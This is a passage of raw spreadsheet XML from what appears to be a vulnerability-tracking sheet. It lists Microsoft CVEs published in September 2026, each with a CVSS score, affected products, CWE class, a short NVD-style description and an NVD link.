s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G165" s="5" t="inlineStr" /><c r="H165" s="5" t="n"><v>0.008</v></c><c r="I165" s="5" t="inlineStr" /><c r="J165" s="5" t="inlineStr" /><c r="K165" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:outlook</t></is></c><c r="L165" s="5" t="inlineStr" /><c r="M165" s="5" t="inlineStr" /><c r="N165" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O165" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P165" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q165" s="5" t="inlineStr" /><c r="R165" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S165" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Outlook allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T165" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69629</t></is></c></row><row r="166"><c r="A166" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B166" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C166" s="5" t="inlineStr"><is><t>CVE-2026-69632</t></is></c><c r="D166" s="5" t="n"><v>8.800000000000001</v></c><c r="E166" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F166" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G166" s="5" t="inlineStr" /><c r="H166" s="5" t="n"><v>0.008</v></c><c r="I166" s="5" t="inlineStr" /><c r="J166" s="5" t="inlineStr" /><c r="K166" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L166" s="5" t="inlineStr" /><c r="M166" s="5" t="inlineStr" /><c r="N166" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O166" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P166" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q166" s="5" t="inlineStr" /><c r="R166" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S166" s="5" t="inlineStr"><is><t>Use after free in Microsoft Office allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T166" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69632</t></is></c></row><row r="167"><c r="A167" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B167" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C167" s="5" t="inlineStr"><is><t>CVE-2026-69649</t></is></c><c r="D167" s="5" t="n"><v>8.800000000000001</v></c><c r="E167" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F167" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G167" s="5" t="inlineStr" /><c r="H167" s="5" t="n"><v>0.008</v></c><c r="I167" s="5" t="inlineStr" /><c r="J167" s="5" t="inlineStr" /><c r="K167" s="5" t="inlineStr" /><c r="L167" s="5" t="inlineStr" /><c r="M167" s="5" t="inlineStr" /><c r="N167" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O167" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P167" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q167" s="5" t="inlineStr" /><c r="R167" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S167" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Raw Image Extension allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T167" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69649</t></is></c></row><row r="168"><c r="A168" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B168" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C168" s="5" t="inlineStr"><is><t>CVE-2026-69669</t></is></c><c r="D168" s="5" t="n"><v>8.800000000000001</v></c><c r="E168" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F168" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G168" s="5" t="inlineStr" /><c r="H168" s="5" t="n"><v>0.008</v></c><c r="I168" s="5" t="inlineStr" /><c r="J168" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K16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68" s="5" t="inlineStr" /><c r="M168" s="5" t="inlineStr" /><c r="N168" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O168" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P168" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q168" s="5" t="inlineStr" /><c r="R168" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S168" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Kernel allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T168" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69669</t></is></c></row><row r="169"><c r="A169" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B169" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C169" s="5" t="inlineStr"><is><t>CVE-2026-69671</t></is></c><c r="D169" s="5" t="n"><v>8.800000000000001</v></c><c r="E169" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F169" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G169" s="5" t="inlineStr" /><c r="H169" s="5" t="n"><v>0.008</v></c><c r="I169" s="5" t="inlineStr" /><c r="J169" s="5" t="inlineStr" /><c r="K169" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L169" s="5" t="inlineStr" /><c r="M169" s="5" t="inlineStr" /><c r="N169" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O169" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P169" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q169" s="5" t="inlineStr" /><c r="R169" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S169" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T169" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69671</t></is></c></row><row r="170"><c r="A170" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B170" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C170" s="5" t="inlineStr"><is><t>CVE-2026-69676</t></is></c><c r="D170" s="5" t="n"><v>8.800000000000001</v></c><c r="E170" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F170" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G170" s="5" t="inlineStr" /><c r="H170" s="5" t="n"><v>0.012</v></c><c r="I170" s="5" t="inlineStr" /><c r="J170" s="5" t="inlineStr" /><c r="K170" s="5" t="inlineStr" /><c r="L170" s="5" t="inlineStr" /><c r="M170" s="5" t="inlineStr" /><c r="N170" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O170" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P170" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q170" s="5" t="inlineStr" /><c r="R170" s="5" t="inlineStr"><is><t>CWE-294</t></is></c><c r="S170" s="5" t="inlineStr"><is><t>Authentication bypass by capture-replay in Windows Kerberos allows an authorized attacker to execute code over a network.</t></is></c><c r="T170" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69676</t></is></c></row><row r="171"><c r="A171" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B171" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C171" s="5" t="inlineStr"><is><t>CVE-2026-69678</t></is></c><c r="D171" s="5" t="n"><v>8.800000000000001</v></c><c r="E171" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F171" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G171" s="5" t="inlineStr" /><c r="H171" s="5" t="n"><v>0.008</v></c><c r="I171" s="5" t="inlineStr" /><c r="J171" s="5" t="inlineStr" /><c r="K171" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:powerpoint</t></is></c><c r="L171" s="5" t="inlineStr" /><c r="M171" s="5" t="inlineStr" /><c r="N171" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O171" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P171" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q171" s="5" t="inlineStr" /><c r="R171" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S171" s="5" t="inlineStr"><is><t>Use after free in Microsoft Office PowerPoint allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T171" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69678</t></is></c></row><row r="172"><c r="A172" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B172" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C172" s="5" t="inlineStr"><is><t>CVE-2026-69686</t></is></c><c r="D172" s="5" t="n"><v>8.800000000000001</v></c><c r="E172" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F172" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G172" s="5" t="inlineStr" /><c r="H172" s="5" t="n"><v>0.008</v></c><c r="I172" s="5" t="inlineStr" /><c r="J172" s="5" t="inlineStr" /><c r="K172" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L172" s="5" t="inlineStr" /><c r="M172" s="5" t="inlineStr" /><c r="N172" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O172" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P172" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q172" s="5" t="inlineStr" /><c r="R172" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S172" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T172" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69686</t></is></c></row><row r="173"><c r="A173" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B173" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C173" s="5" t="inlineStr"><is><t>CVE-2026-69712</t></is></c><c r="D173" s="5" t="n"><v>8.800000000000001</v></c><c r="E173" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F173" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G173" s="5" t="inlineStr" /><c r="H173" s="5" t="n"><v>0.008999999999999999</v></c><c r="I173" s="5" t="inlineStr" /><c r="J173" s="5" t="inlineStr" /><c r="K173" s="5" t="inlineStr" /><c r="L173" s="5" t="inlineStr" /><c r="M173" s="5" t="inlineStr" /><c r="N173" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O173" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P173" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q173" s="5" t="inlineStr" /><c r="R173" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S173" s="5" t="inlineStr"><is><t>Use after free in Windows Key Distribution Center allows an authorized attacker to execute code over a network.</t></is></c><c r="T173" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69712</t></is></c></row><row r="174"><c r="A174" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B174" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C174" s="5" t="inlineStr"><is><t>CVE-2026-69716</t></is></c><c r="D174" s="5" t="n"><v>8.800000000000001</v></c><c r="E174" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F174" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G174" s="5" t="inlineStr" /><c r="H174" s="5" t="n"><v>0.008999999999999999</v></c><c r="I174" s="5" t="inlineStr" /><c r="J174" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K174" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L174" s="5" t="inlineStr" /><c r="M174" s="5" t="inlineStr" /><c r="N174" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O174" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P174" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q174" s="5" t="inlineStr" /><c r="R174" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S174" s="5" t="inlineStr"><is><t>Improper neutralization of special elements used in an sql command ('sql injection') in Microsoft Office SharePoint allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T174" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69716</t></is></c></row><row r="175"><c r="A175" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B175" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C175" s="5" t="inlineStr"><is><t>CVE-2026-69722</t></is></c><c r="D175" s="5" t="n"><v>8.800000000000001</v></c><c r="E175" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F175" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G175" s="5" t="inlineStr" /><c r="H175" s="5" t="n"><v>0.008</v></c><c r="I175" s="5" t="inlineStr" /><c r="J175" s="5" t="inlineStr" /><c r="K175" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L175" s="5" t="inlineStr" /><c r="M175" s="5" t="inlineStr" /><c r="N175" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O175" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P175" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q175" s="5" t="inlineStr" /><c r="R175" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S175" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T175" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69722</t></is></c></row><row r="176"><c r="A176" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B176" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C176" s="5" t="inlineStr"><is><t>CVE-2026-69724</t></is></c><c r="D176" s="5" t="n"><v>8.800000000000001</v></c><c r="E176" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F176" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G176" s="5" t="inlineStr" /><c r="H176" s="5" t="n"><v>0.008</v></c><c r="I176" s="5" t="inlineStr" /><c r="J176" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K176" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L176" s="5" t="inlineStr" /><c r="M176" s="5" t="inlineStr" /><c r="N176" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O176" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P176" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q176" s="5" t="inlineStr" /><c r="R176" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S176" s="5" t="inlineStr"><is><t>Missing authorization in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t></is></c><c r="T176" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69724</t></is></c></row><row r="177"><c r="A177" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B177" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C177" s="5" t="inlineStr"><is><t>CVE-2026-69729</t></is></c><c r="D177" s="5" t="n"><v>8.800000000000001</v></c><c r="E177" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F177" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G177" s="5" t="inlineStr" /><c r="H177" s="5" t="n"><v>0.008999999999999999</v></c><c r="I177" s="5" t="inlineStr" /><c r="J177" s="5" t="inlineStr" /><c r="K177" s="5" t="inlineStr" /><c r="L177" s="5" t="inlineStr" /><c r="M177" s="5" t="inlineStr" /><c r="N177" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O177" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P177" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q177" s="5" t="inlineStr" /><c r="R177" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S177" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Credential Providers allows an authorized attacker to execute code over a network.</t></is></c><c r="T177" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69729</t></is></c></row><row r="178"><c r="A178" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B178" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C178" s="5" t="inlineStr"><is><t>CVE-2026-69740</t></is></c><c r="D178" s="5" t="n"><v>8.800000000000001</v></c><c r="E178" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F178" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G178" s="5" t="inlineStr" /><c r="H178" s="5" t="n"><v>0.003</v></c><c r="I178" s="5" t="inlineStr" /><c r="J178" s="5" t="inlineStr" /><c r="K178" s="5" t="inlineStr" /><c r="L178" s="5" t="inlineStr" /><c r="M178" s="5" t="inlineStr" /><c r="N178" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O178" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P178" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q178" s="5" t="inlineStr" /><c r="R178" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S178" s="5" t="inlineStr"><is><t>Use after free in Windows Hello allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T178" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69740</t></is></c></row><row r="179"><c r="A179" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B179" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C179" s="5" t="inlineStr"><is><t>CVE-2026-69742</t></is></c><c r="D179" s="5" t="n"><v>8.800000000000001</v></c><c r="E179" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F179" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G179" s="5" t="inlineStr" /><c r="H179" s="5" t="n"><v>0.008</v></c><c r="I179" s="5" t="inlineStr" /><c r="J179" s="5" t="inlineStr" /><c r="K179" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:publisher</t></is></c><c r="L179" s="5" t="inlineStr" /><c r="M179" s="5" t="inlineStr" /><c r="N179" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O179" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P179" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q179" s="5" t="inlineStr" /><c r="R179" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S179" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Microsoft Office Publisher allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T179" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69742</t></is></c></row><row r="180"><c r="A180" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B180" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C180" s="5" t="inlineStr"><is><t>CVE-2026-69759</t></is></c><c r="D180" s="5" t="n"><v>8.800000000000001</v></c><c r="E180" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F180" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G180" s="5" t="inlineStr" /><c r="H180" s="5" t="n"><v>0.008</v></c><c r="I180" s="5" t="inlineStr" /><c r="J180" s="5" t="inlineStr" /><c r="K180" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L180" s="5" t="inlineStr" /><c r="M180" s="5" t="inlineStr" /><c r="N180" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O180" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P180" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q180" s="5" t="inlineStr" /><c r="R180" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S180" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T180" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69759</t></is></c></row><row r="181"><c r="A181" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B181" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C181" s="5" t="inlineStr"><is><t>CVE-2026-69764</t></is></c><c r="D181" s="5" t="n"><v>8.800000000000001</v></c><c r="E181" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F181" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G181" s="5" t="inlineStr" /><c r="H181" s="5" t="n"><v>0.008</v></c><c r="I181" s="5" t="inlineStr" /><c r="J181" s="5" t="inlineStr" /><c r="K181" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L181" s="5" t="inlineStr" /><c r="M181" s="5" t="inlineStr" /><c r="N181" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O181" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P181" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q181" s="5" t="inlineStr" /><c r="R181" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S181" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T181" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69764</t></is></c></row><row r="182"><c r="A182" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B182" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C182" s="5" t="inlineStr"><is><t>CVE-2026-69767</t></is></c><c r="D182" s="5" t="n"><v>8.800000000000001</v></c><c r="E182" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F182" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G182" s="5" t="inlineStr" /><c r="H182" s="5" t="n"><v>0.008</v></c><c r="I182" s="5" t="inlineStr" /><c r="J182" s="5" t="inlineStr" /><c r="K182" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:powerpoint</t></is></c><c r="L182" s="5" t="inlineStr" /><c r="M182" s="5" t="inlineStr" /><c r="N182" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O182" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P182" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q182" s="5" t="inlineStr" /><c r="R182" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S182" s="5" t="inlineStr"><is><t>Use after free in Microsoft Office PowerPoint allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T182" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69767</t></is></c></row><row r="183"><c r="A183" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B183" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C183" s="5" t="inlineStr"><is><t>CVE-2026-69772</t></is></c><c r="D183" s="5" t="n"><v>8.800000000000001</v></c><c r="E183" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F183" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G183" s="5" t="inlineStr" /><c r="H183" s="5" t="n"><v>0.008</v></c><c r="I183" s="5" t="inlineStr" /><c r="J183" s="5" t="inlineStr" /><c r="K183" s="5" t="inlineStr" /><c r="L183" s="5" t="inlineStr" /><c r="M183" s="5" t="inlineStr" /><c r="N183" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O183" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P183" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q183" s="5" t="inlineStr" /><c r="R183" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S183" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Network File System allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T183" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69772</t></is></c></row><row r="184"><c r="A184" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B184" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C184" s="5" t="inlineStr"><is><t>CVE-2026-69778</t></is></c><c r="D184" s="5" t="n"><v>8.800000000000001</v></c><c r="E184" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F184" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G184" s="5" t="inlineStr" /><c r="H184" s="5" t="n"><v>0.008</v></c><c r="I184" s="5" t="inlineStr" /><c r="J184" s="5" t="inlineStr" /><c r="K184" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:access, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L184" s="5" t="inlineStr" /><c r="M184" s="5" t="inlineStr" /><c r="N184" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O184" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P184" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q184" s="5" t="inlineStr" /><c r="R184" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S184" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Access allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T184" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69778</t></is></c></row><row r="185"><c r="A185" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B185" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C185" s="5" t="inlineStr"><is><t>CVE-2026-69784</t></is></c><c r="D185" s="5" t="n"><v>8.800000000000001</v></c><c r="E185" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F185" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G185" s="5" t="inlineStr" /><c r="H185" s="5" t="n"><v>0.003</v></c><c r="I185" s="5" t="inlineStr" /><c r="J185" s="5" t="inlineStr" /><c r="K185" s="5" t="inlineStr" /><c r="L185" s="5" t="inlineStr" /><c r="M185" s="5" t="inlineStr" /><c r="N185" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O185" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P185" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q185" s="5" t="inlineStr" /><c r="R185" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S185" s="5" t="inlineStr"><is><t>Use after free in Windows Hello allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T185" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69784</t></is></c></row><row r="186"><c r="A186" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B186" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C186" s="5" t="inlineStr"><is><t>CVE-2026-69797</t></is></c><c r="D186" s="5" t="n"><v>8.800000000000001</v></c><c r="E186" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F186" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G186" s="5" t="inlineStr" /><c r="H186" s="5" t="n"><v>0.008</v></c><c r="I186" s="5" t="inlineStr" /><c r="J186" s="5" t="inlineStr" /><c r="K186" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:powerpoint</t></is></c><c r="L186" s="5" t="inlineStr" /><c r="M186" s="5" t="inlineStr" /><c r="N186" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O186" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P186" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q186" s="5" t="inlineStr" /><c r="R186" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S186" s="5" t="inlineStr"><is><t>Use after free in Microsoft Office PowerPoint allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T186" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69797</t></is></c></row><row 